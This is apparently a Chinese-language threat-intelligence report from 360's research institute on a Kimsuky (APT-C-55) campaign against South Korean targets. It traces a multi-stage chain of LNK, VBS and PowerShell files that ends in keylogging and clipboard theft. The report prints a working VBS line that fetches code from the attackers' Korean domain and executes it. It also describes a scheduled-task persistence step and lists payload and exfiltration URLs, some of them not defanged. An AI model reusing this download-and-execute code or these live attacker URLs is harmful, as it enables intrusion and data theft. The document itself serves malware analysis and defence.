APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

APT 8个月前 admin

454 0 0

APT-C-55

Kimsuky

APT-C-55（Kimsuky）组织最早由Kaspersky在2013年披露，该组织长期针对于韩国的智囊团、政府外交、新闻组织、教育学术机构等进行攻击，在过去几年里，他们将攻击目标扩大到包括美国、俄罗斯和欧洲各国在内的国家。主要目的为窃取情报、进行网络攻击活动等。该组织十分活跃，即使近几年安全厂商连续披露其攻击活动，但也未曾阻止APT-C-55的潜伏及攻击，其攻击活动反而有越演越烈之势。不但如此，该组织还不断开发各类攻击载荷，包括带有漏洞的hwp文件、恶意宏文件、释放载荷的PE文件、lnk文件等。

近期，360高级威胁研究院在日常情报挖掘中发现并捕获到了Kimsuky组织针对韩国地区的最新攻击行动。该组织一如既往地采用恶意宏文件、LNK文件作为攻击入口点，诱导用户点击恶意文件，从而开启一段复杂多阶段的无文件攻击链，最终窃取用户信息。需要特别说明的是，这轮攻击中Kimsuky组织使用了韩文域名进行恶意载荷下载、通信，并没有使用常规的英文域名。

一、攻击活动分析

1.攻击流程分析

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

Kimsuky组织以lnk文件为初始载荷，当点击lnk文件后会从自身解密释放出VBS脚本文件并执行，其释放脚本向服务器下载第二阶段VBS载荷，该载荷会继续释放VBS文件并注册计划任务，同时下载Powershell脚本负责收集信息并回传。注册的计划任务主要功能是负责下载执行后续VBS载荷，该VBS载荷从服务器下载最终的Powershell代码并内存执行，从而完成窃密功能。

2.载荷投递分析

本次捕获的样本信息如下所示：

MD5	433a2a49a84545f23a038f3584f28b4a
文件大小	7.37 KB (7550 字节)
文件类型	LNK

对恶意lnk解析获取的执行参数如下所示：

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

可以发现lnk文件使用了大量不可见字符和无意义字符进行填充以此来降低受害者的防备。打开lnk文件的属性目标参数如下所示。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

目标参数实为一段Powershell脚本，通过读取自身并异或0x77进行解密，解密后以“asdfgqwert”为分隔符将后部分内容保存到temp目录下并命名为tmp[随机数].vbs文件。解密后的VBS文件如下所示。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

从上可以看出VBS使用字符混淆，对应替换处理即可，主要功能为从地址http://xn-vn4b27hka971hbue.kr/src/cheditor4/icons/button/upload/list.php?query=1下载后续载荷并执行。

下载内容仍是VBS脚本，部分内容如下：

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

其功能是首先将以下字符串写入文件并保存到%AppData%RoamingMicrosoftWindowsTemplatesOfficeAppManifest_v[Minute]_[Hour]_[Day+Month].xml（时间为当前执行时间）。

On Error Resume Next:With CreateObject(“”InternetExplorer.Application””):.Navigate “”” & http://xn--vn4b27hka971hbue.kr/src/cheditor4/icons/button/upload/up& “/list.php?query=6″”:Do while .busy:WScript.Sleep 100:Loop:bt=.Document.Body.InnerText:.Quit:End With:Execute(bt)

接着以“Microsoft”为所有者创建计划任务，并每15分钟利用wscript执行一次上述保存的xml文件，以此实现驻留。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

最后从地址http://xn--vn4b27hka971hbue.kr/src/cheditor4/icons/button/upload/up/lib.php?idx=1下载Powershell脚本负责收集主机信息并上传。

上述提到的攻击者注册的计划任务主要功能则是从http://xn--vn4b27hka971hbue.kr/src/cheditor4/icons/button/upload/up/list.php?query=6下载后续载荷并执行。需要注意的是，域名xn--vn4b27hka971hbue.kr，实际是上韩文域名인쇄테이프.kr，之所以显示不一样是，是由于浏览器内置的Punycode（RFC 3492）的算法，会将一个非英语文字转换成只包含英文和数字的另一串新文字，打开上述URL地址，我们可以明显看到相应韩文地址。此外，域名中的韩文“인쇄테이프” 意为打印带，域名主页是一家名为“汉索尔胶带”的公司主页，猜测该网站可能被Kimsuky组织攻占。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

接着从参数为idx=5的URL中进一步下载载荷，可以看出载荷是编码后的Powershell脚本。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

3.攻击组件分析

对URL参数为idx=5的下载载荷进行解密后，发现整个文件混淆十分严重，极不利于阅读，如下图所示：

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

经过分析去混淆后，其功能是先创建互斥体“GlobalAlreadyRunning19122”，保持单一运行，接着判断%appdata%MicrosoftWindowsTemplatesPages_Elements.xml文件是否存在，若存在则读取文件内容并Base64编码发送至服务器http://xn--vn4b27hka971hbue.kr/src/cheditor4/icons/button/upload/up/show.php，然后删除该文件。若不存在，则将剪切板内容和键盘记录保存至该文件，等待下次数据回传。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

本次下载的最终载荷功能主要是获取剪切板内容和键盘记录，回看整个攻击过程，该组织利用驻留VBS脚本下载并内存执行query=6的脚本进行攻击，由于query=6文件保存在服务端，并且其作用是继续下载RUL后缀为idx=5的功能载荷，结合URL特点来看可以猜测，攻击者只需更改服务端query=6文件里面的idx参数值就可以此控制分发不同的载荷，从而即可实施不同场景下不同需求的攻击行动。此外，该攻击手法的另一大好处是可以有效避免载荷泄露，并且发现受害者不符合攻击目标时，可以马上关闭连接。

二、关联分析

在今年同时期，我们也发现了APT-C-55组织针对韩国地区的多个恶意宏攻击样本，样本信息如下表所示：

MD5

91d0b01a6a4a0b8edadf1df6a8e68d20

f2e74b749c04936cfc253e05da8de4d0

文件类型

doc

C&C

http://mvix[.]xn--oi2b61z32a.xn--3e0b707e/ej/li.txt

APT-C-55组织伪装成个人信息填写表诱导用户，伪装内容如下图所示：

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

用户点击并允许宏代码执行后，就会从远端韩文地址（http://mvix[.]xn--oi2b61z32a.xn--3e0b707e/ej/li.txt）下载恶意载荷并执行。需要注意的是，用户直接打开宏代码窗口时看不到任何代码，提示需要输入密码。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

移除保护密码后，就能看到从远端下载恶意载荷的宏代码，如下图所示：

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

在浏览器中输入地址http://mvix[.]xn--oi2b61z32a.xn--3e0b707e/ej/li.txt，也可以看到会显示韩文地址。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

不过遗憾的是，我们并没有成功下载后续恶意载荷，猜测后续流程应该跟上述lnk文件类似。另外，除了上述下载恶意载荷代码外，还有通过Selection.TypeText监控文本输入动作的宏代码，不过攻击者并没有通过它执行关键恶意代码，在以前Kimsuky组织使用的宏样本中也存在过类似代码。

APT-C-55（Kimsuky）组织使用韩文域名进行恶意活动

三、归属研判

通过分析样本，发现本轮攻击样本和Kimsuky组织前期攻击组件相似度较高。

1)本次攻击整体流程与前期部分攻击样本类似，都是通过层层下载获取最终的Powershell代码来收集信息，Powershell代码类似，只是字符串混淆严重。并且在下载过程中，都使用了类似*.php？query=1, *.php？query=6, *.php？idx=1等C&C格式，回传地址末尾也是show.php，这些都跟之前Kimsuky组织使用的C&C很类似。

2)攻击者使用的部分代码具有鲜明特点，本次捕获到的最终载荷解密后，发现通信时使用了如下的硬编码User-Agent发起HTTP请求。

Mozilla/5.0 (Windows NT 10.x; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chremo/87.0.4280.141 Safari/537.36 Edgo/87.0.664.75

其中用错误的拼写“Chremo”“Edgo”表示“Chrome”和“Edge”，这里之前的Kimsuky组织也使用过类似User-Agent。另外，关联分析提到的Selection.TypeText监控文本输入的操作，也与之前攻击宏样本类似。

3)恶意宏样本诱饵文档信息显示为韩文，载荷通信以及下载都使用了韩文域名，再结合攻击样本来源显示为韩国，这些信息都与APT-C-55的攻击目标一致，且符合APT-C-55是一个非常了解韩语群体的特点。

综上，将本轮攻击行动归属到APT-C-55（Kimsuky）组织。

总结

APT-C-55（Kimsuky）组织长期针对韩国政府部门进行攻击，攻击手法灵活多变，常使用社会工程学、鱼叉邮件、水坑攻击等手段投递恶意文件，并且文件类型也是多种多样，包括但不限于带有漏洞的hwp文件、恶意宏文件、释放载荷的PE文件、lnk文件等。本次攻击中使用的Powershell代码进行了完全的混淆，攻击过程中又使用了韩文域名，这都表明该组织持续地进行更新恶意代码形态以及不断增加所属的域名资产。

需要说明的是，本文披露的相关恶意代码、C&C只是APT-C-55组织近期部分攻击过程中的所使用的载荷，该组织不会因为一次攻击行动的暴露而停止活动，反而会持续更新其载荷。在这里提醒用户加强安全意识，不要执行未知样本、点击来历不明的链接等，否则容易在毫无防范的情况下被攻陷，进而泄漏机密文件、重要情报。

附录 IOC

MD5:

91d0b01a6a4a0b8edadf1df6a8e68d20

f2e74b749c04936cfc253e05da8de4d0

433a2a49a84545f23a038f3584f28b4a

955170427d0c4f9c23f7b8507a6003aa

86f5d04ad7c6cefd795ae717d9752737

cadbf74e83332a3bd95721a791e2f35c

8516b530ebdee3b320c7e9ca0f1fec78

URL:

http://mvix.xn--oi2b61z32a[.]xn--3e0b707e/ej/li.txt

http://xn--vn4b27hka971hbue[.]kr/src/cheditor4/icons/button/upload/up/list.php?query=1

http://xn--vn4b27hka971hbue[.]kr/src/cheditor4/icons/button/upload/up/list.php?query=6

http://xn--vn4b27hka971hbue[.]kr/src/cheditor4/icons/button/upload/up/lib.php?idx=5

http://xn--vn4b27hka971hbue[.]kr/src/cheditor4/icons/button/upload/up/show.php

http://partybbq.co[.]kr/src/bbs/calendar/upload/up/list.php?query=1

360高级威胁研究院

360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。